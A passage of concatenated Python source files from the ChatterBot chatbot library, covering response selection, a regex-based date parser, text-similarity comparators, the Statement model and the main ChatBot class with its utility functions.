:type response_list: list :param storage: An instance of a storage adapter to allow the response selection method to access other statements if needed. :type storage: StorageAdapter :return: Return the first statement in the response list. :rtype: Statement """ logger = logging.getLogger(__name__) logger.info('Selecting first response from list of {} options.'.format( len(response_list) )) return response_list[0] def get_random_response(input_statement, response_list, storage=None): """ :param input_statement: A statement, that closely matches an input to the chat bot. :type input_statement: Statement :param response_list: A list of statement options to choose a response from. :type response_list: list :param storage: An instance of a storage adapter to allow the response selection method to access other statements if needed. :type storage: StorageAdapter :return: Choose a random response from the selection. :rtype: Statement """ from random import choice logger = logging.getLogger(__name__) logger.info('Selecting a response from list of {} options.'.format( len(response_list) )) return choice(response_list) File: chatterbot/parsing.py import re from datetime import timedelta, datetime import calendar # Variations of dates that the parser can capture year_variations = ['year', 'years', 'yrs'] day_variations = ['days', 'day'] minute_variations = ['minute', 'minutes', 'mins'] hour_variations = ['hrs', 'hours', 'hour'] week_variations = ['weeks', 'week', 'wks'] month_variations = ['month', 'months'] # Variables used for RegEx Matching day_names = 'monday|tuesday|wednesday|thursday|friday|saturday|sunday' month_names_long = ( 'january|february|march|april|may|june|july|august|september|october|november|december' ) month_names = month_names_long + '|jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec' day_nearest_names = 'today|yesterday|tomorrow|tonight|tonite' numbers = ( r'(^a(?=\s)|one|two|three|four|five|six|seven|eight|nine|ten|' r'eleven|twelve|thirteen|fourteen|fifteen|sixteen|seventeen|' r'eighteen|nineteen|twenty|thirty|forty|fifty|sixty|seventy|' r'eighty|ninety|hundred|thousand)' ) re_dmy = '(' + '|'.join(day_variations + minute_variations + year_variations + week_variations + month_variations) + ')' re_duration = r'(before|after|earlier|later|ago|from\snow)' re_year = r'(19|20)\d{2}|^(19|20)\d{2}' re_timeframe = r'this|coming|next|following|previous|last|end\sof\sthe' re_ordinal = r'st|nd|rd|th|first|second|third|fourth|fourth|' + re_timeframe re_time = r'(?P<hour>\d{1,2})(?=\s?(\:\d|(a|p)m))(\:(?P<minute>\d{1,2}))?(\s?(?P<convention>(am|pm)))?' 
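# e.g. in "meet me at 5:30pm" this pattern captures hour='5', minute='30',
# convention='pm'; a bare "7 pm" yields hour='7', convention='pm' and no minute group.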
re_separator = r'of|at|on' NUMBERS = { 'zero': 0, 'one': 1, 'two': 2, 'three': 3, 'four': 4, 'five': 5, 'six': 6, 'seven': 7, 'eight': 8, 'nine': 9, 'ten': 10, 'eleven': 11, 'twelve': 12, 'thirteen': 13, 'fourteen': 14, 'fifteen': 15, 'sixteen': 16, 'seventeen': 17, 'eighteen': 18, 'nineteen': 19, 'twenty': 20, 'thirty': 30, 'forty': 40, 'fifty': 50, 'sixty': 60, 'seventy': 70, 'eighty': 80, 'ninety': 90, 'hundred': 100, 'thousand': 1000, 'million': 1000000, 'billion': 1000000000, 'trillion': 1000000000000, } # Mapping of Month name and Value HASHMONTHS = { 'january': 1, 'jan': 1, 'february': 2, 'feb': 2, 'march': 3, 'mar': 3, 'april': 4, 'apr': 4, 'may': 5, 'june': 6, 'jun': 6, 'july': 7, 'jul': 7, 'august': 8, 'aug': 8, 'september': 9, 'sep': 9, 'october': 10, 'oct': 10, 'november': 11, 'nov': 11, 'december': 12, 'dec': 12 } # Days to number mapping HASHWEEKDAYS = { 'monday': 0, 'mon': 0, 'tuesday': 1, 'tue': 1, 'wednesday': 2, 'wed': 2, 'thursday': 3, 'thu': 3, 'friday': 4, 'fri': 4, 'saturday': 5, 'sat': 5, 'sunday': 6, 'sun': 6 } # Ordinal to number HASHORDINALS = { 'zeroth': 0, 'first': 1, 'second': 2, 'third': 3, 'fourth': 4, 'forth': 4, 'fifth': 5, 'sixth': 6, 'seventh': 7, 'eighth': 8, 'ninth': 9, 'tenth': 10, 'eleventh': 11, 'twelfth': 12, 'thirteenth': 13, 'fourteenth': 14, 'fifteenth': 15, 'sixteenth': 16, 'seventeenth': 17, 'eighteenth': 18, 'nineteenth': 19, 'twentieth': 20, 'last': -1 } # A list tuple of regular expressions / parser fn to match # Start with the widest match and narrow it down because the order of the match in this list matters regex = [ ( re.compile( r''' ( ((?P<dow>%s)[,\s]\s*)? #Matches Monday, 12 Jan 2012, 12 Jan 2012 etc (?P<day>\d{1,2}) # Matches a digit (%s)? [-\s] # One or more space (?P<month>%s) # Matches any month name [-\s] # Space (?P<year>%s) # Year ((\s|,\s|\s(%s))?\s*(%s))? ) ''' % (day_names, re_ordinal, month_names, re_year, re_separator, re_time), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime( int(m.group('year') if m.group('year') else base_date.year), HASHMONTHS[m.group('month').strip().lower()], int(m.group('day') if m.group('day') else 1), ) + timedelta(**convert_time_to_hour_minute( m.group('hour'), m.group('minute'), m.group('convention') )) ), ( re.compile( r''' ( ((?P<dow>%s)[,\s][-\s]*)? #Matches Monday, Jan 12 2012, Jan 12 2012 etc (?P<month>%s) # Matches any month name [-\s] # Space ((?P<day>\d{1,2})) # Matches a digit (%s)? ([-\s](?P<year>%s))? # Year ((\s|,\s|\s(%s))?\s*(%s))? ) ''' % (day_names, month_names, re_ordinal, re_year, re_separator, re_time), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime( int(m.group('year') if m.group('year') else base_date.year), HASHMONTHS[m.group('month').strip().lower()], int(m.group('day') if m.group('day') else 1) ) + timedelta(**convert_time_to_hour_minute( m.group('hour'), m.group('minute'), m.group('convention') )) ), ( re.compile( r''' ( (?P<month>%s) # Matches any month name [-\s] # One or more space (?P<day>\d{1,2}) # Matches a digit (%s)? [-\s]\s*? (?P<year>%s) # Year ((\s|,\s|\s(%s))?\s*(%s))? ) ''' % (month_names, re_ordinal, re_year, re_separator, re_time), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime( int(m.group('year') if m.group('year') else base_date.year), HASHMONTHS[m.group('month').strip().lower()], int(m.group('day') if m.group('day') else 1), ) + timedelta(**convert_time_to_hour_minute( m.group('hour'), m.group('minute'), m.group('convention') )) ), ( re.compile( r''' ( ((?P<number>\d+|(%s[-\s]?)+)\s)? 
# Matches any number or string 25 or twenty five (?P<unit>%s)s?\s # Matches days, months, years, weeks, minutes (?P<duration>%s) # before, after, earlier, later, ago, from now (\s*(?P<base_time>(%s)))? ((\s|,\s|\s(%s))?\s*(%s))? ) ''' % (numbers, re_dmy, re_duration, day_nearest_names, re_separator, re_time), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: date_from_duration( base_date, m.group('number'), m.group('unit').lower(), m.group('duration').lower(), m.group('base_time') ) + timedelta(**convert_time_to_hour_minute( m.group('hour'), m.group('minute'), m.group('convention') )) ), ( re.compile( r''' ( (?P<ordinal>%s) # First quarter of 2014 \s+ quarter\sof \s+ (?P<year>%s) ) ''' % (re_ordinal, re_year), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: date_from_quarter( base_date, HASHORDINALS[m.group('ordinal').lower()], int(m.group('year') if m.group('year') else base_date.year) ) ), ( re.compile( r''' ( (?P<ordinal_value>\d+) (?P<ordinal>%s) # 1st January 2012 ((\s|,\s|\s(%s))?\s*)? (?P<month>%s) ([,\s]\s*(?P<year>%s))? ) ''' % (re_ordinal, re_separator, month_names, re_year), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime( int(m.group('year') if m.group('year') else base_date.year), int(HASHMONTHS[m.group('month').lower()] if m.group('month') else 1), int(m.group('ordinal_value') if m.group('ordinal_value') else 1), ) ), ( re.compile( r''' ( (?P<month>%s) \s+ (?P<ordinal_value>\d+) (?P<ordinal>%s) # January 1st 2012 ([,\s]\s*(?P<year>%s))? ) ''' % (month_names, re_ordinal, re_year), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime( int(m.group('year') if m.group('year') else base_date.year), int(HASHMONTHS[m.group('month').lower()] if m.group('month') else 1), int(m.group('ordinal_value') if m.group('ordinal_value') else 1), ) ), ( re.compile( r''' (?P<time>%s) # this, next, following, previous, last \s+ ((?P<number>\d+|(%s[-\s]?)+)\s)? (?P<dmy>%s) # year, day, week, month, night, minute, min ((\s|,\s|\s(%s))?\s*(%s))? ''' % (re_timeframe, numbers, re_dmy, re_separator, re_time), (re.VERBOSE | re.IGNORECASE), ), lambda m, base_date: date_from_relative_week_year( base_date, m.group('time').lower(), m.group('dmy').lower(), m.group('number') ) + timedelta(**convert_time_to_hour_minute( m.group('hour'), m.group('minute'), m.group('convention') )) ), ( re.compile( r''' (?P<time>%s) # this, next, following, previous, last \s+ (?P<dow>%s) # mon - fri ((\s|,\s|\s(%s))?\s*(%s))? ''' % (re_timeframe, day_names, re_separator, re_time), (re.VERBOSE | re.IGNORECASE), ), lambda m, base_date: date_from_relative_day( base_date, m.group('time').lower(), m.group('dow') ) + timedelta(**convert_time_to_hour_minute( m.group('hour'), m.group('minute'), m.group('convention') )) ), ( re.compile( r''' ( (?P<day>\d{1,2}) # Day, Month (%s) [-\s] # One or more space (?P<month>%s) ) ''' % (re_ordinal, month_names), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime( base_date.year, HASHMONTHS[m.group('month').strip().lower()], int(m.group('day') if m.group('day') else 1) ) ), ( re.compile( r''' ( (?P<month>%s) # Month, day [-\s] # One or more space ((?P<day>\d{1,2})\b) # Matches a digit January 12 (%s)? 
) ''' % (month_names, re_ordinal), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime( base_date.year, HASHMONTHS[m.group('month').strip().lower()], int(m.group('day') if m.group('day') else 1) ) ), ( re.compile( r''' ( (?P<month>%s) # Month, year [-\s] # One or more space ((?P<year>\d{1,4})\b) # Matches a digit January 12 ) ''' % (month_names), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime( int(m.group('year')), HASHMONTHS[m.group('month').strip().lower()], 1 ) ), ( re.compile( r''' ( (?P<month>\d{1,2}) # MM/DD or MM/DD/YYYY / ((?P<day>\d{1,2})) (/(?P<year>%s))? ) ''' % (re_year), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime( int(m.group('year') if m.group('year') else base_date.year), int(m.group('month').strip()), int(m.group('day')) ) ), ( re.compile( r''' (?P<adverb>%s) # today, yesterday, tomorrow, tonight ((\s|,\s|\s(%s))?\s*(%s))? ''' % (day_nearest_names, re_separator, re_time), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: date_from_adverb( base_date, m.group('adverb') ) + timedelta(**convert_time_to_hour_minute( m.group('hour'), m.group('minute'), m.group('convention') )) ), ( re.compile( r''' (?P<named_day>%s) # Mon - Sun ''' % (day_names), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: this_week_day( base_date, HASHWEEKDAYS[m.group('named_day').lower()] ) ), ( re.compile( r''' (?P<year>%s) # Year ''' % (re_year), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime(int(m.group('year')), 1, 1) ), ( re.compile( r''' (?P<month>%s) # Month ''' % (month_names_long), (re.VERBOSE | re.IGNORECASE) ), lambda m, base_date: datetime( base_date.year, HASHMONTHS[m.group('month').lower()], 1 ) ), ( re.compile( r''' (%s) # Matches time 12:00 am or 12:00 pm ''' % (re_time), (re.VERBOSE | re.IGNORECASE), ), lambda m, base_date: datetime( base_date.year, base_date.month, base_date.day ) + timedelta(**convert_time_to_hour_minute( m.group('hour'), m.group('minute'), m.group('convention') )) ), ( re.compile( r''' ( (?P<hour>\d+) # Matches 12 hours, 2 hrs \s+ (%s) ) ''' % ('|'.join(hour_variations)), (re.VERBOSE | re.IGNORECASE), ), lambda m, base_date: datetime( base_date.year, base_date.month, base_date.day, int(m.group('hour')) ) ) ] def convert_string_to_number(value): """ Convert strings to numbers """ if value is None: return 1 if isinstance(value, int): return value if value.isdigit(): return int(value) num_list = map(lambda s: NUMBERS[s], re.findall(numbers + '+', value.lower())) return sum(num_list) def convert_time_to_hour_minute(hour, minute, convention): """ Convert time to hour, minute """ if hour is None: hour = 0 if minute is None: minute = 0 if convention is None: convention = 'am' hour = int(hour) minute = int(minute) if convention.lower() == 'pm': hour += 12 return {'hours': hour, 'minutes': minute} def date_from_quarter(base_date, ordinal, year): """ Extract date from quarter of a year """ interval = 3 month_start = interval * (ordinal - 1) if month_start < 0: month_start = 9 month_end = month_start + interval if month_start == 0: month_start = 1 return [ datetime(year, month_start, 1), datetime(year, month_end, calendar.monthrange(year, month_end)[1]) ] def date_from_relative_day(base_date, time, dow): """ Converts relative day to time Ex: this tuesday, last tuesday """ # Reset date to start of the day base_date = datetime(base_date.year, base_date.month, base_date.day) time = time.lower() dow = dow.lower() if time == 'this' or time == 'coming': # Else day of week num = HASHWEEKDAYS[dow] return 
this_week_day(base_date, num) elif time == 'last' or time == 'previous': # Else day of week num = HASHWEEKDAYS[dow] return previous_week_day(base_date, num) elif time == 'next' or time == 'following': # Else day of week num = HASHWEEKDAYS[dow] return next_week_day(base_date, num) def date_from_relative_week_year(base_date, time, dow, ordinal=1): """ Converts relative day to time Eg. this tuesday, last tuesday """ # If there is an ordinal (next 3 weeks) => return a start and end range # Reset date to start of the day relative_date = datetime(base_date.year, base_date.month, base_date.day) ord = convert_string_to_number(ordinal) if dow in year_variations: if time == 'this' or time == 'coming': return datetime(relative_date.year, 1, 1) elif time == 'last' or time == 'previous': return datetime(relative_date.year - 1, relative_date.month, 1) elif time == 'next' or time == 'following': return relative_date + timedelta(ord * 365) elif time == 'end of the': return datetime(relative_date.year, 12, 31) elif dow in month_variations: if time == 'this': return datetime(relative_date.year, relative_date.month, relative_date.day) elif time == 'last' or time == 'previous': return datetime(relative_date.year, relative_date.month - 1, relative_date.day) elif time == 'next' or time == 'following': if relative_date.month + ord >= 12: month = relative_date.month - 1 + ord year = relative_date.year + month // 12 month = month % 12 + 1 day = min(relative_date.day, calendar.monthrange(year, month)[1]) return datetime(year, month, day) else: return datetime(relative_date.year, relative_date.month + ord, relative_date.day) elif time == 'end of the': return datetime( relative_date.year, relative_date.month, calendar.monthrange(relative_date.year, relative_date.month)[1] ) elif dow in week_variations: if time == 'this': return relative_date - timedelta(days=relative_date.weekday()) elif time == 'last' or time == 'previous': return relative_date - timedelta(weeks=1) elif time == 'next' or time == 'following': return relative_date + timedelta(weeks=ord) elif time == 'end of the': day_of_week = base_date.weekday() return day_of_week + timedelta(days=6 - relative_date.weekday()) elif dow in day_variations: if time == 'this': return relative_date elif time == 'last' or time == 'previous': return relative_date - timedelta(days=1) elif time == 'next' or time == 'following': return relative_date + timedelta(days=ord) elif time == 'end of the': return datetime(relative_date.year, relative_date.month, relative_date.day, 23, 59, 59) def date_from_adverb(base_date, name): """ Convert Day adverbs to dates Tomorrow => Date Today => Date """ # Reset date to start of the day adverb_date = datetime(base_date.year, base_date.month, base_date.day) if name == 'today' or name == 'tonite' or name == 'tonight': return adverb_date.today().replace(hour=0, minute=0, second=0, microsecond=0) elif name == 'yesterday': return adverb_date - timedelta(days=1) elif name == 'tomorrow' or name == 'tom': return adverb_date + timedelta(days=1) def date_from_duration(base_date, number_as_string, unit, duration, base_time=None): """ Find dates from duration Eg: 20 days from now Currently does not support strings like "20 days from last monday". 
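Illustrative examples: with base_date = datetime(2018, 3, 14), the arguments
('3', 'weeks', 'ago') resolve to datetime(2018, 2, 21) and
('2', 'days', 'from now') resolve to datetime(2018, 3, 16).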
""" # Check if query is `2 days before yesterday` or `day before yesterday` if base_time is not None: base_date = date_from_adverb(base_date, base_time) num = convert_string_to_number(number_as_string) if unit in day_variations: args = {'days': num} elif unit in minute_variations: args = {'minutes': num} elif unit in week_variations: args = {'weeks': num} elif unit in month_variations: args = {'days': 365 * num / 12} elif unit in year_variations: args = {'years': num} if duration == 'ago' or duration == 'before' or duration == 'earlier': if 'years' in args: return datetime(base_date.year - args['years'], base_date.month, base_date.day) return base_date - timedelta(**args) elif duration == 'after' or duration == 'later' or duration == 'from now': if 'years' in args: return datetime(base_date.year + args['years'], base_date.month, base_date.day) return base_date + timedelta(**args) def this_week_day(base_date, weekday): """ Finds coming weekday """ day_of_week = base_date.weekday() # If today is Tuesday and the query is `this monday` # We should output the next_week monday if day_of_week > weekday: return next_week_day(base_date, weekday) start_of_this_week = base_date - timedelta(days=day_of_week + 1) day = start_of_this_week + timedelta(days=1) while day.weekday() != weekday: day = day + timedelta(days=1) return day def previous_week_day(base_date, weekday): """ Finds previous weekday """ day = base_date - timedelta(days=1) while day.weekday() != weekday: day = day - timedelta(days=1) return day def next_week_day(base_date, weekday): """ Finds next weekday """ day_of_week = base_date.weekday() end_of_this_week = base_date + timedelta(days=6 - day_of_week) day = end_of_this_week + timedelta(days=1) while day.weekday() != weekday: day = day + timedelta(days=1) return day def datetime_parsing(text, base_date=datetime.now()): """ Extract datetime objects from a string of text. """ matches = [] found_array = [] # Find the position in the string for expression, function in regex: for match in expression.finditer(text): matches.append((match.group(), function(match, base_date), match.span())) # Wrap the matched text with TAG element to prevent nested selections for match, value, spans in matches: subn = re.subn( '(?!<TAG[^>]*?>)' + match + '(?![^<]*?</TAG>)', '<TAG>' + match + '</TAG>', text ) text = subn[0] is_substituted = subn[1] if is_substituted != 0: found_array.append((match, value, spans)) # To preserve order of the match, sort based on the start position return sorted(found_array, key=lambda match: match and match[2][0]) File: chatterbot/comparisons.py """ This module contains various text-comparison algorithms designed to compare one statement to another. """ from chatterbot.exceptions import OptionalDependencyImportError from difflib import SequenceMatcher class Comparator: def __init__(self, language): self.language = language def __call__(self, statement_a, statement_b): return self.compare(statement_a, statement_b) def compare(self, statement_a, statement_b): return 0 class LevenshteinDistance(Comparator): """ Compare two statements based on the Levenshtein distance of each statement's text. For example, there is a 65% similarity between the statements "where is the post office?" and "looking for the post office" based on the Levenshtein distance algorithm. """ def compare(self, statement_a, statement_b): """ Compare the two input statements. :return: The percent of similarity between the text of the statements. 
:rtype: float """ # Return 0 if either statement has a falsy text value if not statement_a.text or not statement_b.text: return 0 # Get the lowercase version of both strings statement_a_text = str(statement_a.text.lower()) statement_b_text = str(statement_b.text.lower()) similarity = SequenceMatcher( None, statement_a_text, statement_b_text ) # Calculate a decimal percent of the similarity percent = round(similarity.ratio(), 2) return percent class SpacySimilarity(Comparator): """ Calculate the similarity of two statements using Spacy models. """ def __init__(self, language): super().__init__(language) try: import spacy except ImportError: message = ( 'Unable to import "spacy".\n' 'Please install "spacy" before using the SpacySimilarity comparator:\n' 'pip3 install "spacy>=2.1,<2.2"' ) raise OptionalDependencyImportError(message) self.nlp = spacy.load(self.language.ISO_639_1) def compare(self, statement_a, statement_b): """ Compare the two input statements. :return: The percent of similarity between the closest synset distance. :rtype: float """ document_a = self.nlp(statement_a.text) document_b = self.nlp(statement_b.text) return document_a.similarity(document_b) class JaccardSimilarity(Comparator): """ Calculates the similarity of two statements based on the Jaccard index. The Jaccard index is composed of a numerator and denominator. In the numerator, we count the number of items that are shared between the sets. In the denominator, we count the total number of items across both sets. Let's say we define sentences to be equivalent if 50% or more of their tokens are equivalent. Here are two sample sentences: The young cat is hungry. The cat is very hungry. When we parse these sentences to remove stopwords, we end up with the following two sets: {young, cat, hungry} {cat, very, hungry} In our example above, our intersection is {cat, hungry}, which has count of two. The union of the sets is {young, cat, very, hungry}, which has a count of four. Therefore, our `Jaccard similarity index`_ is two divided by four, or 50%. Given our similarity threshold above, we would consider this to be a match. .. _`Jaccard similarity index`: https://en.wikipedia.org/wiki/Jaccard_index """ def __init__(self, language): super().__init__(language) try: import spacy except ImportError: message = ( 'Unable to import "spacy".\n' 'Please install "spacy" before using the JaccardSimilarity comparator:\n' 'pip3 install "spacy>=2.1,<2.2"' ) raise OptionalDependencyImportError(message) self.nlp = spacy.load(self.language.ISO_639_1) def compare(self, statement_a, statement_b): """ Return the calculated similarity of two statements based on the Jaccard index. """ # Make both strings lowercase document_a = self.nlp(statement_a.text.lower()) document_b = self.nlp(statement_b.text.lower()) statement_a_lemmas = set([ token.lemma_ for token in document_a if not token.is_stop ]) statement_b_lemmas = set([ token.lemma_ for token in document_b if not token.is_stop ]) # Calculate Jaccard similarity numerator = len(statement_a_lemmas.intersection(statement_b_lemmas)) denominator = float(len(statement_a_lemmas.union(statement_b_lemmas))) ratio = numerator / denominator return ratio File: chatterbot/conversation.py from pytz import UTC from datetime import datetime from dateutil import parser as date_parser class StatementMixin(object): """ This class has shared methods used to normalize different statement models. 
""" statement_field_names = [ 'id', 'text', 'search_text', 'conversation', 'persona', 'tags', 'in_response_to', 'search_in_response_to', 'created_at', ] extra_statement_field_names = [] def get_statement_field_names(self): """ Return the list of field names for the statement. """ return self.statement_field_names + self.extra_statement_field_names def get_tags(self): """ Return the list of tags for this statement. """ return self.tags def add_tags(self, *tags): """ Add a list of strings to the statement as tags. """ self.tags.extend(tags) def serialize(self): """ :returns: A dictionary representation of the statement object. :rtype: dict """ data = {} for field_name in self.get_statement_field_names(): format_method = getattr(self, 'get_{}'.format( field_name ), None) if format_method: data[field_name] = format_method() else: data[field_name] = getattr(self, field_name) return data class Statement(StatementMixin): """ A statement represents a single spoken entity, sentence or phrase that someone can say. """ __slots__ = ( 'id', 'text', 'search_text', 'conversation', 'persona', 'tags', 'in_response_to', 'search_in_response_to', 'created_at', 'confidence', 'storage', ) def __init__(self, text, in_response_to=None, **kwargs): self.id = kwargs.get('id') self.text = str(text) self.search_text = kwargs.get('search_text', '') self.conversation = kwargs.get('conversation', '') self.persona = kwargs.get('persona', '') self.tags = kwargs.pop('tags', []) self.in_response_to = in_response_to self.search_in_response_to = kwargs.get('search_in_response_to', '') self.created_at = kwargs.get('created_at', datetime.now()) if not isinstance(self.created_at, datetime): self.created_at = date_parser.parse(self.created_at) # Set timezone to UTC if no timezone was provided if not self.created_at.tzinfo: self.created_at = self.created_at.replace(tzinfo=UTC) # This is the confidence with which the chat bot believes # this is an accurate response. This value is set when the # statement is returned by the chat bot. self.confidence = 0 self.storage = None def __str__(self): return self.text def __repr__(self): return '<Statement text:%s>' % (self.text) def save(self): """ Save the statement in the database. """ self.storage.update(self) File: chatterbot/constants.py """ ChatterBot constants """ ''' The maximum length of characters that the text of a statement can contain. The number 255 is used because that is the maximum length of a char field in most databases. This value should be enforced on a per-model basis by the data model for each storage adapter. ''' STATEMENT_TEXT_MAX_LENGTH = 255 ''' The maximum length of characters that the text label of a conversation can contain. The number 32 was chosen because that is the length of the string representation of a UUID4 with no hyphens. ''' CONVERSATION_LABEL_MAX_LENGTH = 32 ''' The maximum length of text that can be stored in the persona field of the statement model. ''' PERSONA_MAX_LENGTH = 50 # The maximum length of characters that the name of a tag can contain TAG_NAME_MAX_LENGTH = 50 DEFAULT_DJANGO_APP_NAME = 'django_chatterbot' File: chatterbot/__init__.py """ ChatterBot is a machine learning, conversational dialog engine. """ from .chatterbot import ChatBot __all__ = ( 'ChatBot', ) File: chatterbot/chatterbot.py import logging from chatterbot.storage import StorageAdapter from chatterbot.logic import LogicAdapter from chatterbot.search import TextSearch, IndexedTextSearch from chatterbot import utils class ChatBot(object): """ A conversational dialog chat bot. 
""" def __init__(self, name, **kwargs): self.name = name storage_adapter = kwargs.get('storage_adapter', 'chatterbot.storage.SQLStorageAdapter') logic_adapters = kwargs.get('logic_adapters', [ 'chatterbot.logic.BestMatch' ]) # Check that each adapter is a valid subclass of it's respective parent utils.validate_adapter_class(storage_adapter, StorageAdapter) # Logic adapters used by the chat bot self.logic_adapters = [] self.storage = utils.initialize_class(storage_adapter, **kwargs) primary_search_algorithm = IndexedTextSearch(self, **kwargs) text_search_algorithm = TextSearch(self, **kwargs) self.search_algorithms = { primary_search_algorithm.name: primary_search_algorithm, text_search_algorithm.name: text_search_algorithm } for adapter in logic_adapters: utils.validate_adapter_class(adapter, LogicAdapter) logic_adapter = utils.initialize_class(adapter, self, **kwargs) self.logic_adapters.append(logic_adapter) preprocessors = kwargs.get( 'preprocessors', [ 'chatterbot.preprocessors.clean_whitespace' ] ) self.preprocessors = [] for preprocessor in preprocessors: self.preprocessors.append(utils.import_module(preprocessor)) self.logger = kwargs.get('logger', logging.getLogger(__name__)) # Allow the bot to save input it receives so that it can learn self.read_only = kwargs.get('read_only', False) def get_response(self, statement=None, **kwargs): """ Return the bot's response based on the input. :param statement: An statement object or string. :returns: A response to the input. :rtype: Statement :param additional_response_selection_parameters: Parameters to pass to the chat bot's logic adapters to control response selection. :type additional_response_selection_parameters: dict :param persist_values_to_response: Values that should be saved to the response that the chat bot generates. :type persist_values_to_response: dict """ Statement = self.storage.get_object('statement') additional_response_selection_parameters = kwargs.pop('additional_response_selection_parameters', {}) persist_values_to_response = kwargs.pop('persist_values_to_response', {}) if isinstance(statement, str): kwargs['text'] = statement if isinstance(statement, dict): kwargs.update(statement) if statement is None and 'text' not in kwargs: raise self.ChatBotException( 'Either a statement object or a "text" keyword ' 'argument is required. Neither was provided.' 
) if hasattr(statement, 'serialize'): kwargs.update(**statement.serialize()) tags = kwargs.pop('tags', []) text = kwargs.pop('text') input_statement = Statement(text=text, **kwargs) input_statement.add_tags(*tags) # Preprocess the input statement for preprocessor in self.preprocessors: input_statement = preprocessor(input_statement) # Make sure the input statement has its search text saved if not input_statement.search_text: input_statement.search_text = self.storage.tagger.get_text_index_string(input_statement.text) if not input_statement.search_in_response_to and input_statement.in_response_to: input_statement.search_in_response_to = self.storage.tagger.get_text_index_string(input_statement.in_response_to) response = self.generate_response(input_statement, additional_response_selection_parameters) # Update any response data that needs to be changed if persist_values_to_response: for response_key in persist_values_to_response: response_value = persist_values_to_response[response_key] if response_key == 'tags': input_statement.add_tags(*response_value) response.add_tags(*response_value) else: setattr(input_statement, response_key, response_value) setattr(response, response_key, response_value) if not self.read_only: self.learn_response(input_statement) # Save the response generated for the input self.storage.create(**response.serialize()) return response def generate_response(self, input_statement, additional_response_selection_parameters=None): """ Return a response based on a given input statement. :param input_statement: The input statement to be processed. """ Statement = self.storage.get_object('statement') results = [] result = None max_confidence = -1 for adapter in self.logic_adapters: if adapter.can_process(input_statement): output = adapter.process(input_statement, additional_response_selection_parameters) results.append(output) self.logger.info( '{} selected "{}" as a response with a confidence of {}'.format( adapter.class_name, output.text, output.confidence ) ) if output.confidence > max_confidence: result = output max_confidence = output.confidence else: self.logger.info( 'Not processing the statement using {}'.format(adapter.class_name) ) class ResultOption: def __init__(self, statement, count=1): self.statement = statement self.count = count # If multiple adapters agree on the same statement, # then that statement is more likely to be the correct response if len(results) >= 3: result_options = {} for result_option in results: result_string = result_option.text + ':' + (result_option.in_response_to or '') if result_string in result_options: result_options[result_string].count += 1 if result_options[result_string].statement.confidence < result_option.confidence: result_options[result_string].statement = result_option else: result_options[result_string] = ResultOption( result_option ) most_common = list(result_options.values())[0] for result_option in result_options.values(): if result_option.count > most_common.count: most_common = result_option if most_common.count > 1: result = most_common.statement response = Statement( text=result.text, in_response_to=input_statement.text, conversation=input_statement.conversation, persona='bot:' + self.name ) response.confidence = result.confidence return response def learn_response(self, statement, previous_statement=None): """ Learn that the statement provided is a valid response. 
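
        A minimal usage sketch (assuming ``bot`` is an already-constructed
        ``ChatBot`` instance)::

            from chatterbot.conversation import Statement

            # bot is assumed to be an existing ChatBot instance
            question = Statement(text='What time is it?')
            answer = Statement(text='It is noon.')

            # Teach the bot that ``answer`` is a valid reply to ``question``
            bot.learn_response(answer, previous_statement=question)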
""" if not previous_statement: previous_statement = statement.in_response_to if not previous_statement: previous_statement = self.get_latest_response(statement.conversation) if previous_statement: previous_statement = previous_statement.text previous_statement_text = previous_statement if not isinstance(previous_statement, (str, type(None), )): statement.in_response_to = previous_statement.text elif isinstance(previous_statement, str): statement.in_response_to = previous_statement self.logger.info('Adding "{}" as a response to "{}"'.format( statement.text, previous_statement_text )) # Save the input statement return self.storage.create(**statement.serialize()) def get_latest_response(self, conversation): """ Returns the latest response in a conversation if it exists. Returns None if a matching conversation cannot be found. """ from chatterbot.conversation import Statement as StatementObject conversation_statements = list(self.storage.filter( conversation=conversation, order_by=['id'] )) # Get the most recent statement in the conversation if one exists latest_statement = conversation_statements[-1] if conversation_statements else None if latest_statement: if latest_statement.in_response_to: response_statements = list(self.storage.filter( conversation=conversation, text=latest_statement.in_response_to, order_by=['id'] )) if response_statements: return response_statements[-1] else: return StatementObject( text=latest_statement.in_response_to, conversation=conversation ) else: # The case that the latest statement is not in response to another statement return latest_statement return None class ChatBotException(Exception): pass File: chatterbot/utils.py """ ChatterBot utility functions """ def import_module(dotted_path): """ Imports the specified module based on the dot notated import path for the module. """ import importlib module_parts = dotted_path.split('.') module_path = '.'.join(module_parts[:-1]) module = importlib.import_module(module_path) return getattr(module, module_parts[-1]) def initialize_class(data, *args, **kwargs): """ :param data: A string or dictionary containing a import_path attribute. """ if isinstance(data, dict): import_path = data.get('import_path') data.update(kwargs) Class = import_module(import_path) return Class(*args, **data) else: Class = import_module(data) return Class(*args, **kwargs) def validate_adapter_class(validate_class, adapter_class): """ Raises an exception if validate_class is not a subclass of adapter_class. :param validate_class: The class to be validated. :type validate_class: class :param adapter_class: The class type to check against. :type adapter_class: class :raises: Adapter.InvalidAdapterTypeException """ from chatterbot.adapters import Adapter # If a dictionary was passed in, check if it has an import_path attribute if isinstance(validate_class, dict): if 'import_path' not in validate_class: raise Adapter.InvalidAdapterTypeException( 'The dictionary {} must contain a value for "import_path"'.format( str(validate_class) ) ) # Set the class to the import path for the next check validate_class = validate_class.get('import_path') if not issubclass(import_module(validate_class), adapter_class): raise Adapter.InvalidAdapterTypeException( '{} must be a subclass of {}'.format( validate_class, adapter_class.__name__ ) ) def get_response_time(chatbot, statement='Hello'): """ Returns the amount of time taken for a given chat bot to return a response. :param chatbot: A chat bot instance. :type chatbot: ChatBot :returns: The response time in seconds. 
